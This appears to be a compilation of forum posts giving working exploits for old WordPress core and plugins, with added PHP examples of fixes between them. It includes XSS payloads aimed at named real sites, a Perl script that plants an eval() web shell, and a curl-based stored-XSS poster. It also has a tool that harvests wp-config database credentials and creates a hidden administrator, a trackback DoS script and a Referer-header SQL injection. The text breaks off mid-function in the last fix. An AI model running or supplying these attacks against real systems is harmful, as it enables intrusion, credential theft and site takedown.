WordPress Plugin Advanced Twitter Widget 1.0.2 XSS Vuln
http://wordpress.org/extend/plugins/advanced-twitter-widget/
\advanced-twitter-widget.php
(c)eLwaux 30.06.2009, uasc.org.ua

PHP:
 89: if($_POST['advanced_twitter_widget_value']!=""){
 90:     $xArrOptions[0]= $_POST['advanced_twitter_widget_title'];
 91:     $xArrOptions[1]= $_POST['advanced_twitter_widget_value'];
 92:     $xArrOptions[2]= $_POST['advanced_twitter_widget_type'];
 93:     $xArrOptions[3]= $_POST['advanced_twitter_widget_count'];
 94:     update_option('advanced_twitter_widget_options', serialize($xArrOptions));
 95: }
 97: $xArrOptions = unserialize(get_option('advanced_twitter_widget_options'));
101: $xTitle = $xArrOptions[0];
102: $xValue = $xArrOptions[1];
103: $xType = $xArrOptions[2];
104: $xCount = $xArrOptions[3];
111: Title:<br/><input type="text" name="advanced_twitter_widget_title" value="<?php echo $xTitle;?>" /><br/><br/>
112: Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="<?php echo $xValue;?>" /><br/><br/>

exploit:
Code:
POST: advanced_twitter_widget_value=">{XSS1}<a "
POST: advanced_twitter_widget_title=">{XSS2}<a "
POST: advanced_twitter_widget_type=.
POST: advanced_twitter_widget_count=.
WordPress Plugin ImHuman 0.0.9 XSS Vuln
http://wordpress.org/extend/plugins/imhuman-a-humanized-captcha/
\imhuman.php
(c)eLwaux 30.06.2009, uasc.org.ua

PHP:
151: if(isset( $_POST['do'] )) {
152:     if ( function_exists('current_user_can') && !current_user_can('manage_options') )
153:         die(__('Cheatin’ uh?'));
154:     check_admin_referer($plugin_page);
155:
156:     $t['imhuman_api_user'] = $_POST['imhuman_api_user'];
157:     $t['imhuman_api_key'] = $_POST['imhuman_api_key'];
158:     $t['imhuman_row'] = $_POST['imhuman_row'];
159:     $t['imhuman_col'] = $_POST['imhuman_col'];
160:     $t['imhuman_sel'] = $_POST['imhuman_sel'];
161:     $t['imhuman_exc'] = isset($_POST['imhuman_exc'] ) ? 1 : 0;
162:     $t['imhuman_word'] = $_POST['imhuman_word'];
163:     $t['imhuman_lang'] = $_POST['imhuman_lang'];
164:     update_option( 'imhuman_options', $t );
165:     $m = '<p>Settings Saved!</p>';
166: }
167: $options = get_option( 'imhuman_options' );
....
194: <td><input type="text" name="imhuman_api_user" id="imhuman_api_user" value="<?php echo $options['imhuman_api_user']; ?>" /></td>
195: </tr>
196: <tr>
197: <th><?php _e('ImHuman Ap? Key'); ?></th>
198: <td><input type="text" name="imhuman_api_key" id="imhuman_api_key" value="<?php echo $options['imhuman_api_key']; ?>" /></td>

exploit:
Code:
POST: do=.
POST: imhuman_api_user=">{XSS1}<a "
POST: imhuman_api_key=">{XSS1}<a "
POST: imhuman_row=.
POST: imhuman_col=.
POST: imhuman_sel=.
POST: imhuman_word=.
POST: imhuman_lang=.
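Both posts above store the POSTed settings with update_option() unchanged and echo them straight back into value="" attributes; ImHuman at least checks the capability and the nonce, Advanced Twitter Widget does neither. The following is an added example, not code from either plugin, of the two halves of the fix: validate each field on save and escape every value on output. The allowed widget types, the count range and the account/search pattern are this example's assumptions; clean_text() mirrors what sanitize_text_field() does in WordPress and the escaping is what esc_attr() does.

```php
<?php
// Added example (not the plugins' code): validate widget settings on save and
// escape them on output. Option names come from the Advanced Twitter Widget
// post; ALLOWED_TYPES and the count range are assumptions.
declare(strict_types=1);

const ALLOWED_TYPES = ['user', 'search'];   // assumption: the widget's two modes

// Strip tags and control bytes, collapse whitespace, cap the length.
function clean_text(string $raw, int $max = 100): string
{
    $s = strip_tags($raw);
    $s = preg_replace('/[\x00-\x1F\x7F]+/', '', $s) ?? '';
    $s = trim(preg_replace('/\s+/', ' ', $s) ?? '');
    return mb_substr($s, 0, $max);
}

// Validate the POSTed form. Returns the cleaned options, or null when any
// field is unacceptable (the caller then never calls update_option()).
function validate_widget_options(array $post): ?array
{
    $title = clean_text((string)($post['advanced_twitter_widget_title'] ?? ''));
    $value = clean_text((string)($post['advanced_twitter_widget_value'] ?? ''));
    $type  = (string)($post['advanced_twitter_widget_type'] ?? '');
    $count = filter_var($post['advanced_twitter_widget_count'] ?? null,
        FILTER_VALIDATE_INT, ['options' => ['min_range' => 1, 'max_range' => 50]]);

    // A Twitter handle or search term: letters, digits, '_', '#', '@', spaces.
    if ($value === '' || !preg_match('/^[\w#@ ]{1,100}$/u', $value)) {
        return null;
    }
    if (!in_array($type, ALLOWED_TYPES, true) || $count === false) {
        return null;
    }
    return ['title' => $title, 'value' => $value, 'type' => $type, 'count' => $count];
}

// Render the settings form. Every value is attribute-escaped, so a stored
// "> ... <a " can no longer break out of the value="" attribute.
function render_options_form(array $opts): string
{
    $a = fn(string $v): string => htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return 'Title:<br/><input type="text" name="advanced_twitter_widget_title" value="'
        . $a($opts['title']) . '" /><br/><br/>' . "\n"
        . 'Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="'
        . $a($opts['value']) . '" /><br/><br/>' . "\n";
}

// Constructed input: the POST body from the advisory above.
$hostile = [
    'advanced_twitter_widget_title' => '">{XSS2}<a ',
    'advanced_twitter_widget_value' => '">{XSS1}<a ',
    'advanced_twitter_widget_type'  => '.',
    'advanced_twitter_widget_count' => '.',
];
var_dump(validate_widget_options($hostile));   // NULL: value, type and count all fail

$benign = [
    'advanced_twitter_widget_title' => 'Latest <b>tweets</b>',
    'advanced_twitter_widget_value' => 'wordpress',
    'advanced_twitter_widget_type'  => 'user',
    'advanced_twitter_widget_count' => '5',
];
echo render_options_form(validate_widget_options($benign));

// A hostile title that reached the database before the fix is still harmless
// once the output is escaped:
echo render_options_form(['title' => '">{XSS2}<a ', 'value' => 'wordpress']);
```

The output escaping is the part that matters for data already in the database; validation on save only protects what is stored from now on. In a real plugin both sit behind current_user_can('manage_options') and check_admin_referer(), as ImHuman already does.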
WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
Code:
http://wordpress.org/extend/plugins/wordpress-toolbar/
http://abhinavsingh.com/blog/2009/02/wordpress-toolbar-plugin/
Dork: "inurl:wp-toolbar.php"

## ## ## ## eLwaux(c)2009 UASC.org.ua ## ## ## ##

Path Disclosure
/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
( call to undefined function add_action() )
-----------------------------------------------------------------
 1: <?php
12: include_once("socialsites.php");
14: add_action('admin_menu','wordpress_toolbar_admin');
-----------------------------------------------------------------
example:
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://www.maktabe.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://helenoticias.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://seattlesocialmedia.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php

## ## ## ## XSS
/wp-content/plugins/wordpress-toolbar/toolbar.php
-----------------------------------------------------------------
30: $tourl = $_GET['wp-toolbar-tourl'];
42: $blogtitle = $_GET['wp-toolbar-blogtitle'];
52: <title><?php echo $blogtitle; ?> - Toolbar</title>
56: <iframe frameborder="0" noresize="noresize" src="<?php echo $tourl; ?>"
-----------------------------------------------------------------
PoC:
wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title>{XSS}
wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl=">{XSS}<div id="
example:
http://www.alymelfashionfusion.com/Blog/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
http://www.pclinuxos.hu/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl="><script>alert(/xss2/);</script><div%20id="
Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
Requires an admin login:password.
Code:
------------
http://wordpress.org/extend/plugins/add-uroksu-catalog/
Add UROK.su Catalog Version: 1.03
------------
\wp-content\plugins\add-uroksu-catalog\urok.su.class.php
----------------------------------------------------------------------
|56| if (isset($_POST['UPDATE'])) {
|57|     $MyUROKsu_user=$_REQUEST['login'];
|58|     $file_name=$file_name=dirname(__FILE__).'/login.txt';
|59|     $w=fopen($file_name,'w');
|60|     fwrite($w,$MyUROKsu_user);
|61|     fclose($w);
|62|     print($this->update_catalog($MyUROKsu_user));
|63|     echo '</p>';
|64| }
----------------------------------------------------------------------
Steps to code execution:
1) /wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php
   POST: UPDATE=.& login=<?php=@eval($_GET['c']);?>
   (your code will be saved to file: /wp-content/plugins/add-uroksu-catalog/login.txt)
2) include this file & code execute:
   /wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=system('id');

perl exploit:
----------------------------------------------------------------------
#! /usr/bin/perl -w
use LWP::UserAgent;
use warnings;

print "\n WP ] add-uroksu-catalog < 1.03 [ exploit\n";
print " eLwaux(c)uasc 2009\n\n";

if (!$ARGV[2]) {
    print " usage:\n".
          " expl.pl http://site.com/wp/index.php adminLogin adminPass\n";
    exit(0);
}

my $mHost = $ARGV[0];
my $mAdmL = $ARGV[1];
my $mAdmP = $ARGV[2];
#$mAdmL =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
#$mAdmP =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;

my $HOST = $1 if ($mHost =~ /http:\/\/(.+?)\//);

my $UA = LWP::UserAgent->new;
$UA->timeout(20);
$UA->default_header('Referer' => $mHost.'wp-login.php');
$UA->default_header('Cookie' => 'wordpress_test_cookie=WP+Cookie+check;');

# login to WP
my $page = $UA->post($mHost.'wp-login.php', {
    log         => $mAdmL,
    pwd         => $mAdmP,
    # rememberme => 'forever',
    submit      => 'Войти',
    redirect_to => $mHost.'wp-admin/',
    testcookie  => 1
})->as_string;

my $cookie = '';
my @SetCookie = ($page =~ m/Set-Cookie: (.+?=.+?);/g);
foreach my $SC (@SetCookie) { $cookie .= $SC.';'; }
if (length($cookie)<100) { print ' - bad login:password!'; exit(0); }
print ' - good login:password!'."\n";
$UA->default_header('Cookie' => $cookie);

print ' .. sending exploit..'."\n";
# send EXPLOIT
$page = $UA->post($mHost.'wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php', {
    login  => '<?php @eval($_GET[\'c\']);?>',
    UPDATE => 1
})->as_string;
print ' + exploit send!'."\n";

# try execute simple code
$page = $UA->get($mHost.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=print_r($_SERVER);')->as_string;
if ($page =~ /\[SERVER_SOFTWARE\] => (.+?)[\r\n]+/) {
    print ' + result of test1: '.$1."\n";
    print ' + result of test2: '.$1."\n" if ($page =~ /\[SCRIPT_FILENAME\] => (.+?)[\r\n]+/);
} else {
    print ' - perhaps code is not injected!'."\n";
}
print ' ! FINISH!'."\n\n";
print ' !! your shell:'."\n";
print ' '.$mHost."\n".
      ' '.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}'."\n";
exit(0);
----------------------------------------------------------------------

simple result on localhost:
----------------------------------------------------------------------
> expl.pl http://localhost/cms/wordpress/ admin "4#@!v^w!*)kW"

 WP ] add-uroksu-catalog < 1.03 [ exploit
 eLwaux(c)uasc 2009

 - good login:password!
 .. sending exploit..
 + exploit send!
 + result of test1: Apache/2.2.11 (Win32) PHP/5.2.9-2
 + result of test2: C:/wamp/www/cms/wordpress/wp-admin/admin.php
 ! FINISH!

 !! your shell:
 http://localhost/cms/wordpress/
 wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}
----------------------------------------------------------------------
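The root cause in the post above is that the plugin copies $_REQUEST['login'] byte for byte into login.txt inside its own directory, a file that the WordPress admin of that era would then include through admin.php?page=. The following is an added example, not the plugin's code, of how a plugin should handle such a value instead: validate it against a strict pattern, refuse anything else, and store it in a form that can never contain a PHP open tag. The character set, the length limit and the JSON file outside the document root are this example's assumptions; in a real plugin the value would simply go into update_option().

```php
<?php
// Added example (not the plugin's code): never write attacker-controlled
// bytes into a file that PHP might include. Validate first, store safely.
declare(strict_types=1);

// Accept only what a catalog login can plausibly contain. The character
// set and the 64-byte limit are assumptions, not the plugin's own rules.
function validate_catalog_login(string $raw): ?string
{
    $login = trim($raw);
    if ($login === '' || strlen($login) > 64) {
        return null;
    }
    // letters, digits, dot, underscore, hyphen: no '<', '?', quotes or spaces
    if (!preg_match('/^[A-Za-z0-9._-]+$/', $login)) {
        return null;
    }
    return $login;
}

// Persist the login. In WordPress this would be update_option('uroksu_login', $login);
// here it is written to a directory outside the web root as an illustration.
function save_catalog_login(string $raw, string $storeDir): bool
{
    $login = validate_catalog_login($raw);
    if ($login === null) {
        return false;                       // refuse; nothing is written
    }
    $file = rtrim($storeDir, '/') . '/login.json';
    // JSON_HEX_TAG turns '<' into \u003C, so even if validation were loosened
    // later the file could never contain a "<?php" open tag for include() to run.
    $json = json_encode(['login' => $login], JSON_HEX_TAG);
    return file_put_contents($file, $json, LOCK_EX) !== false;
}

// Read it back; invalid or missing data yields null rather than a crash.
function load_catalog_login(string $storeDir): ?string
{
    $file = rtrim($storeDir, '/') . '/login.json';
    if (!is_readable($file)) {
        return null;
    }
    $data = json_decode((string)file_get_contents($file), true);
    return is_array($data) && isset($data['login']) ? validate_catalog_login($data['login']) : null;
}

$store = sys_get_temp_dir();   // stands in for a directory outside the web root
var_dump(save_catalog_login("<?php @eval(\$_GET['c']);?>", $store)); // bool(false)
var_dump(save_catalog_login('shop_owner-01', $store));                // bool(true)
var_dump(load_catalog_login($store));                                 // string(13) "shop_owner-01"
```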
XSS [All versions]
An XSS was published today; it works up to and including the current version.
Code:
http://www.site.com'onmousemove='location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);
To fix it, change line ~40 in wp-comments-post.php to:
Code:
$comment_author_url = str_replace(chr(39),'',$comment_author_url);
$comment_author_url = str_replace(chr(59),'',$comment_author_url);
$comment_author_url = str_replace(chr(44),'',$comment_author_url);
Wordpress 2.8.1 (url) Remote Cross Site Scripting Exploit
This can be used to hack 2.8.1 through Remote XSS.
Code:
#!/bin/sh
echo "wp281.quickprz // iso^kpsbr"
SITE=$1
POSTID=$2
MESSAGE="h4x0riZed by the superfreakaz0rz"
if [ "X$SITE" = "X" ]; then
    echo "$0 <url> [postID]"
    echo "f.e. $0 www.worstpress.eu"
    exit
fi
if [ "X$POSTID" = "X" ]; then
    POSTID=1
fi
echo "[+] building payload"
WHERE="title" # can also be 'content'
PATH="$SITE/wp-comments-post.php"
WHERE=`echo -n "$WHERE" | /usr/bin/od -t d1 -A n | /bin/sed 's/\\s\\s*/,/g' | /bin/sed 's/^,//'`
EVILURL="http://w.ch'onmouseover='document.getElementById(String.fromCharCode($WHERE)).value=this.innerHTML;document.getElementById(String.fromCharCode(112,117,98,108,105,115,104)).click();"
echo "[-] payload is $EVILURL for '$MESSAGE'"
EVILURL=`echo -n "$EVILURL" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %`
MESSAGE=`echo -n "$MESSAGE" | /usr/bin/od -t x1 -A n | /usr/bin/tr " " %`
RNDDATA=`/bin/date +%S%s`;
echo "[!] delivering data"
/usr/bin/curl -A "Quickprz" -d "author=$MESSAGE&[email protected]&url=$EVILURL&comment=hi+there%5F+this+is+just+some+very+harmless+spam+$RNDDATA&submit=Submit+Comment&comment_post_ID=$POSTID" $PATH
echo "[X] all done. now wait for admin to mouse-over that name."
# milw0rm.com [2009-07-24]
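The two comment-URL posts above and the wp-toolbar-tourl half of the Wordpress Toolbar post share one defect: a user-supplied URL is written into an href="" or src="" attribute after, at best, a few characters have been stripped. Deleting quotes by hand, as the patch in the previous post does, leaves every other way out of the attribute open. The following is an added example, not WordPress core code and not the exploit author's, of the two steps that close it: sanitize the URL (allowed schemes, a host that is actually a hostname) and then attribute-escape it on output. The scheme allowlist and the length limit are this example's assumptions; the idea is the one behind esc_url() in WordPress.

```php
<?php
// Added example (not WordPress core code): sanitize a user-supplied URL for
// use in href="" / src="", then escape it for the attribute context.
declare(strict_types=1);

const ALLOWED_SCHEMES = ['http', 'https'];   // assumption: what a link or iframe may target

// Return a URL safe for an attribute, or '' when the value must be dropped.
function sanitize_link_url(string $raw): string
{
    // Control bytes and whitespace go first: browsers ignore them inside a
    // scheme, so "java\tscript:" would otherwise slip past the scheme check.
    $url = preg_replace('/[\x00-\x20\x7F]/', '', $raw) ?? '';
    if ($url === '' || strlen($url) > 2048) {
        return '';
    }
    // Scheme-less input such as "example.com" gets http:// prepended.
    if (!preg_match('#^[a-z][a-z0-9+.-]*:#i', $url)) {
        $url = 'http://' . $url;
    }
    $p = parse_url($url);
    if ($p === false || empty($p['host'])) {
        return '';
    }
    if (!in_array(strtolower($p['scheme'] ?? ''), ALLOWED_SCHEMES, true)) {
        return '';                                  // javascript:, data:, vbscript: ...
    }
    // The host must be a real hostname. This is what rejects
    // www.site.com'onmousemove='... : a quote is not a hostname character.
    if (filter_var($p['host'], FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) === false) {
        return '';
    }
    return $url;
}

// Sanitizing and escaping are separate steps; the URL is still escaped for
// the attribute context at the moment it is written into the markup.
function attr(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_author_link(string $name, string $rawUrl): string
{
    $url = sanitize_link_url($rawUrl);
    if ($url === '') {
        return attr($name);                          // plain name, no link at all
    }
    return '<a href="' . attr($url) . '" rel="external nofollow">' . attr($name) . '</a>';
}

function render_toolbar_iframe(string $rawUrl): string
{
    $url = sanitize_link_url($rawUrl);
    return $url === '' ? '' : '<iframe frameborder="0" src="' . attr($url) . '"></iframe>';
}

// Constructed inputs, taken from the payloads quoted in the posts above.
$inputs = [
    "http://www.site.com'onmousemove='location.href=String.fromCharCode(104,116,116,112)",
    "http://w.ch'onmouseover='document.getElementById(String.fromCharCode(116)).click();",
    '"><script>alert(/xss2/);</script><div id="',
    "java\tscript:alert(1)",
    'example.com/blog?ref=1&x=2',
];
foreach ($inputs as $in) {
    echo render_author_link('visitor', $in), "\n";   // only the last input becomes a link
    echo render_toolbar_iframe($in), "\n";           // only the last input becomes an iframe
}
```

The path-disclosure half of the Toolbar post needs no more than the usual direct-access guard at the top of every plugin file, if ( ! defined( 'ABSPATH' ) ) exit;, so that wp-toolbar.php requested on its own never reaches add_action() and never prints a fatal error with the server path in it.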
WP-Config Discover
Code:
<?php
$paths = array(
    "blog",
    "site",
    "html",
    "www",
    "html/blog",
    "www/blog",
    "site/blog",
    "wordpress",
    "wp",
    "www/wp",
    "www/wordpress",
    "html/wordpress",
    "html/wp",
    "public_html",
    "public_html/blog",
    "public_html/wp",
    "public_html/wordpress",
);
$files = array(
    "wp-config.php",
);
print "Checking for ....\n";
if(!is_readable("/etc/passwd")) die("err0r: can't read /etc/passwd (safe mode?)");
$_f = @file("/etc/passwd");
foreach($_f as $usr){
    $usr = explode(":", $usr);
    $uid = $usr[2];
    $home = $usr[5];
    $usr = $usr[0];
    if($uid >= 1000){
        print $usr." (uid:".$uid."): ".$home."\n";
        foreach($paths as $path){
            if(file_exists($home."/".$path)) {
                print "\tSearching in ".$home."/".$path."\n";
                foreach($files as $file){
                    if(file_exists($home."/".$path."/".$file)){
                        print "\t\tFound: ".$file."\n";
                        $__f = @file($home."/".$path."/".$file);
                        foreach($__f as $line){
                            if(stristr($line, "DB_USER")) { preg_match_all('/define\(\'(.*)\);/', $line, $output); print "\t\t\t".str_replace("DB_USER', ","usr=>", $output[1][0])."\n"; }
                            if(stristr($line, "DB_PASSWORD")) { preg_match_all('/define\(\'(.*)\);/', $line, $output2); print "\t\t\t".str_replace("DB_PASSWORD', ", "pwd=>", $output2[1][0])."\n"; }
                            if(stristr($line, "DB_NAME")) { preg_match_all('/define\(\'(.*)\);/', $line, $output3); print "\t\t\t".str_replace("DB_NAME', ", "db=>", $output3[1][0])."\n"; }
                            if(stristr($line, "DB_HOST")) { preg_match_all('/define\(\'(.*)\);/', $line, $output4); print "\t\t\t".str_replace("DB_HOST', ", "host=>", $output4[1][0])."\n"; }
                            if(stristr($line, "\$table_prefix")) { preg_match_all('/\$table_prefix(.*);/', $line, $output5); print "\t\t\tprefix".$output5[1][0]."\n"; }
                            flush();
                        }
                        print "\t\t\tURL: ".getURL($output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
                        if($_GET['attack'] == "create_user") print "\t\t\tUser/pass created: ".UserAdmin("create", $output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
                        if($_GET['attack'] == "delete_user") print "\t\t\tfakeadmin deleted: ".UserAdmin("delete", $output[1][0], $output2[1][0], $output3[1][0], $output4[1][0], $output5[1][0])."\n";
                        flush();
                    }
                }
            }
            flush();
        }
        flush();
    }
}

function getURL($user, $pass, $db, $host, $prefix){
    preg_match_all('/, \'(.*)\'/', $user, $user); $user = $user[1][0];
    preg_match_all('/, \'(.*)\'/', $pass, $pass); $pass = $pass[1][0];
    preg_match_all('/, \'(.*)\'/', $db, $db); $db = $db[1][0];
    preg_match_all('/, \'(.*)\'/', $host, $host); $host = $host[1][0];
    preg_match_all('/\'(.*)\'/', $prefix, $prefix); $prefix = $prefix[1][0];
    $sql = @mysql_connect($host, $user, $pass);
    @mysql_select_db($db);
    $_q = @mysql_query("SELECT option_value FROM ".$prefix."options WHERE option_name='siteurl'", $sql);
    @mysql_close($sql);
    return @mysql_result($_q, 0, 'option_value');
}

function UserAdmin($action, $user, $pass, $db, $host, $prefix){
    preg_match_all('/, \'(.*)\'/', $user, $user); $user = $user[1][0];
    preg_match_all('/, \'(.*)\'/', $pass, $pass); $pass = $pass[1][0];
    preg_match_all('/, \'(.*)\'/', $db, $db); $db = $db[1][0];
    preg_match_all('/, \'(.*)\'/', $host, $host); $host = $host[1][0];
    preg_match_all('/\'(.*)\'/', $prefix, $prefix); $prefix = $prefix[1][0];
    $sql = @mysql_connect($host, $user, $pass);
    @mysql_select_db($db);
    if($action == "create"){
        $wp_uid = rand(9990,99999);
        @mysql_query("INSERT INTO ".$prefix."users(id, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES(".$wp_uid.", 'fakeadmin', md5('dummie'), 'wordpress', '[email protected]', 'http://', NOW(), '', 0, 'wordpressdummieadmin')", $sql);
        @mysql_query("INSERT INTO ".$prefix."usermeta (user_id, meta_key, meta_value) VALUES (".$wp_uid.", 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' )", $sql);
    }
    if($action == "delete"){
        mysql_query("DELETE FROM ".$prefix."usermeta WHERE user_id=(SELECT id FROM ".$prefix."users WHERE user_login='fakeadmin')", $sql);
        mysql_query("DELETE FROM ".$prefix."users WHERE user_login='fakeadmin'", $sql);
    }
    @mysql_close($sql);
    return "fakeadmin/dummie";
}
?>
A serious hole was found in wp-trackback.php. The vulnerability is that any visitor can take the site down with literally 20 requests.
Open wp-trackback.php:
Code:
if ( function_exists('mb_convert_encoding') ) { // For international trackbacks
    $title = mb_convert_encoding($title, get_option('blog_charset'), $charset);
    $excerpt = mb_convert_encoding($excerpt, get_option('blog_charset'), $charset);
    $blog_name = mb_convert_encoding($blog_name, get_option('blog_charset'), $charset);
}
$charset is passed in through $_POST['charset']. And the whole problem lies in how mb_convert_encoding handles the encoding:
Code:
$text = mb_convert_encoding($text,'UTF-8','UTF-7,ISO-8859-1');
This function converts $text to UTF-8. But if we do this:
Code:
$text = mb_convert_encoding($text,'UTF-8','ISO-8859-1,ISO-8859-1,ISO-8859-1,ISO-8859-1');
mb_convert_encoding will try to detect the encoding of $text and will check whether it is ISO-8859-1, again and again. The exploit had already been written before me:
Code:
<?php
//wordpress Resource exhaustion Exploit
// by rooibo
//[email protected] contacted and get a response,
//but no solution available.

if(count($argv) < 2) {
    echo "You need to specify a url to attack\n";
    exit;
}
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2) {
    echo "The url should have http:// in front of it, and should be complete.\n";
    exit;
}
if(count($data) == 2) {
    $path = '';
} else {
    $path = $data['path'];
}
$path = trim($path,'/');
$path .= '/wp-trackback.php';
if($path[0] != '/') {
    $path = '/'.$path;
}
$b = "";
$b = str_pad($b,140000,'ABCEDFG');
$b = utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
$count = 0;
while(1) {
    $fp = @fsockopen($data['host'],80);
    if(!$fp) {
        if($count > 0) {
            echo "down!!!!\n";
            exit;
        }
        echo "unable to connect to: ".$data['host']."\n";
        exit;
    }
    fputs($fp, "POST $path HTTP/1.1\r\n");
    fputs($fp, "Host: ".$data['host']."\r\n");
    fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($fp, "Content-length: ".strlen($str)."\r\n");
    fputs($fp, "Connection: close\r\n\r\n");
    fputs($fp, $str."\r\n\r\n");
    echo "hit!\n";
    $count++;
}
?>
Run it like this: php exploit.php http://site.com
To patch it, open wp-trackback.php and find the line:
Code:
$charset = $_POST['charset'];
Replace it with:
Code:
$charset = str_replace(',', '', $_POST['charset']);
if(is_array($charset)) { exit; }
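The patch at the end of the post above works because mb_convert_encoding() treats a comma-separated from-encoding as a list of candidates to detect, so removing the commas leaves a single name. A stricter version of the same idea is to accept only one known encoding name and fall back to the blog's own charset otherwise, which also stops a bogus name from raising an error in newer PHP. The following is an added example, not WordPress core code: it uses mb_list_encodings() as the allowlist (this example's choice; it does not cover aliases such as latin1) and falls back to UTF-8.

```php
<?php
// Added example (not WordPress core code): validate a trackback's charset
// field before it reaches mb_convert_encoding(). Requires the mbstring extension.
declare(strict_types=1);

// Returns a single canonical encoding name from the allowlist, or null.
function validate_trackback_charset($raw): ?string
{
    if (!is_string($raw)) {               // charset[]=... arrives as an array
        return null;
    }
    $name = strtoupper(trim($raw));
    if ($name === '' || strlen($name) > 40 || strpos($name, ',') !== false) {
        return null;                      // a list of encodings is never acceptable here
    }
    static $allowed = null;
    if ($allowed === null) {
        $allowed = array_map('strtoupper', mb_list_encodings());
    }
    return in_array($name, $allowed, true) ? $name : null;
}

// Convert one trackback field to the blog charset. When the sender's charset
// is unusable the text is assumed to already be in the blog charset
// (that fallback is this example's assumption).
function convert_trackback_field(string $text, $rawCharset, string $blogCharset = 'UTF-8'): string
{
    $from = validate_trackback_charset($rawCharset) ?? $blogCharset;
    return mb_convert_encoding($text, $blogCharset, $from);
}

// Constructed inputs: the exploit's padded list, an array, and normal values.
$flood = str_pad('', 140000, 'UTF-8,');
var_dump(validate_trackback_charset($flood));        // NULL
var_dump(validate_trackback_charset(['UTF-8']));     // NULL
var_dump(validate_trackback_charset('iso-8859-1'));  // string(10) "ISO-8859-1"
var_dump(validate_trackback_charset('utf-7,utf-8')); // NULL

// Constructed Latin-1 bytes for "Café".
$title = mb_convert_encoding("Caf\u{e9}", 'ISO-8859-1', 'UTF-8');
echo convert_trackback_field($title, 'iso-8859-1'), "\n";  // Café: converted once, no detection
echo convert_trackback_field($title, $flood), "\n";        // Caf?: treated as UTF-8, bad byte replaced, no detection loop
```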
WordPress Google Analytics Plugin 3.x
Code:
http://localhost/wp/?s=</script><script>alert(0)</script>
http://localhost/wp/?s=");alert(0);document.write("
cforms plugin path disclosure
Basically, whichever file you hit in there, you get a path disclosure.
File: cforms-captcha.php
PHP:
$im_bg_url= 'captchabg/' . ( prep($_REQUEST['b'],'1.gif') );
///// and then the sloppy getimagesize() call
$image_data=getimagesize($im_bg_url);
Example:
http://www.sakeservices.com/wp-content/plugins/cforms/cforms-captcha.php?b=1'
xcloner plugin phpinfo()
File: /restore/XCloner.php
PHP:
switch ($_REQUEST[task]) {
    case 'step2': step2(); break;
    case 'step1': step1(); break;
    case 'getinfo': getPHPINFO(); break;
    case 'info': echo phpinfo(); break;
    default : start(); break;
}
__http://www.hellboysword.com/wp-content/plugins/xcloner/restore/XCloner.php?task=info
nsx-referers plugin
/wp-content/plugins/nsx-referers/nsx-referers-stat.php
PHP:
.......
$referer = $_SERVER['HTTP_REFERER'];
$ref_arr = parse_url("$referer");
.......
$res_query = urldecode($ref_arr['query']);
if (preg_match("/{$hosts[$host]}(.*?)&/si",$res_query."&",$matches)) {
    $search = $matches[1];
}
if ($wpdb->rows_affected < 1)
    $wpdb->query( "INSERT INTO ".REFTABLE." VALUES ('', '$url', 'NULL', 'NULL', '$search', 1)");
In the Referer we send:
http://yandex.ru/yandsearch?text=wp%27,1),(0x00,0x2f,0x00,0x00,user(),1)%23&lr=6
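The plugin above concatenates the search term it pulls out of the Referer header straight into an INSERT, so a crafted Referer closes the string and appends its own VALUES tuple. The following is an added example, not the plugin's code, of the same feature written with a prepared statement: the term is bound as a parameter and stays data whatever it contains. It runs stand-alone against an in-memory SQLite database through PDO (the table, the column names and the host-to-parameter map are constructed for the example); in a WordPress plugin the equivalent is $wpdb->query( $wpdb->prepare( "INSERT ... VALUES ( %s, %s, %s )", ... ) ).

```php
<?php
// Added example (not the nsx-referers plugin's code): record the search term
// carried in a Referer header using bound parameters. Requires pdo_sqlite.
declare(strict_types=1);

// Search-engine host => query parameter holding the term
// (an assumption standing in for the plugin's $hosts array).
const SEARCH_PARAMS = ['yandex.ru' => 'text', 'www.google.com' => 'q', 'www.bing.com' => 'q'];

// Extract [host, term] from a Referer, or null if it is not a known engine.
function parse_search_referer(string $referer): ?array
{
    $p = parse_url($referer);
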